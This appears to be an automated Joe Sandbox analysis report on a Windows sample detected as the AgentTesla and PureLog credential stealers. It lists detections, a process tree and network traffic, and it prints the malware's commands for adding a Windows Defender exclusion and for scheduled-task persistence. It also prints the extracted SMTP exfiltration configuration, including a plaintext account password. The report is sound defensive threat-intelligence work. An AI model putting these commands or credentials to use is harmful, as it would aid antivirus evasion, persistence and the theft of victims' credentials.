Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kAsh3nmsgs.exe

Overview

General Information

Sample name:kAsh3nmsgs.exe
renamed because original name is a hash value
Original sample name:df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca.exe
Analysis ID:1589087
MD5:71dbd91c836c0b016174ca9e0a2b848a
SHA1:4417ebcd2635eb4f5d66707a2e2bb5440d058c5c
SHA256:df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • kAsh3nmsgs.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\kAsh3nmsgs.exe" MD5: 71DBD91C836C0B016174CA9E0A2B848A)
    • powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7260 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kAsh3nmsgs.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\kAsh3nmsgs.exe" MD5: 71DBD91C836C0B016174CA9E0A2B848A)
  • HHhSyZN.exe (PID: 7512 cmdline: C:\Users\user\AppData\Roaming\HHhSyZN.exe MD5: 71DBD91C836C0B016174CA9E0A2B848A)
    • schtasks.exe (PID: 7780 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HHhSyZN.exe (PID: 7836 cmdline: "C:\Users\user\AppData\Roaming\HHhSyZN.exe" MD5: 71DBD91C836C0B016174CA9E0A2B848A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.kAsh3nmsgs.exe.47324e8.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.kAsh3nmsgs.exe.47324e8.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.kAsh3nmsgs.exe.7e10000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.kAsh3nmsgs.exe.7e10000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    8.2.kAsh3nmsgs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 20 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", ProcessId: 2692, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", ProcessId: 2692, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HHhSyZN.exe, ParentImage: C:\Users\user\AppData\Roaming\HHhSyZN.exe, ParentProcessId: 7512, ParentProcessName: HHhSyZN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp", ProcessId: 7780, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\kAsh3nmsgs.exe, Initiated: true, ProcessId: 7412, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", ProcessId: 7260, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", ProcessId: 2692, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", ProcessId: 7260, ProcessName: schtasks.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: kAsh3nmsgs.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeAvira: detection malicious, Label: HEUR/AGEN.1305452
                      Found malware configuration
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeReversingLabs: Detection: 79%
                      Multi AV Scanner detection for submitted file
                      Source: kAsh3nmsgs.exeReversingLabs: Detection: 79%
                      Source: kAsh3nmsgs.exeVirustotal: Detection: 61%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: kAsh3nmsgs.exeJoe Sandbox ML: detected
                      Source: kAsh3nmsgs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: kAsh3nmsgs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 4x nop then jmp 0F180114h0_2_0F180123
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 4x nop then jmp 0B2DEC54h9_2_0B2DEC70
                      Source: global trafficTCP traffic: 192.168.2.4:49734 -> 77.88.21.158:587
                      Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49734 -> 77.88.21.158:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: smtp.yandex.com
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.g
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl?
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaov
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189046055.0000000008AA4000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B33000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4188194749.000000000947F000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/roo#
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B54000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4188990103.0000000008A94000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4167554620.0000000006A77000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4168112478.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4188194749.0000000009443000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001403000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187357779.0000000009408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B54000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4166846886.0000000006A4F000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4167554620.0000000006A77000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4168112478.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003161000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                      Source: HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsigx
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189046055.0000000008AA4000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B33000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4188194749.000000000947F000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
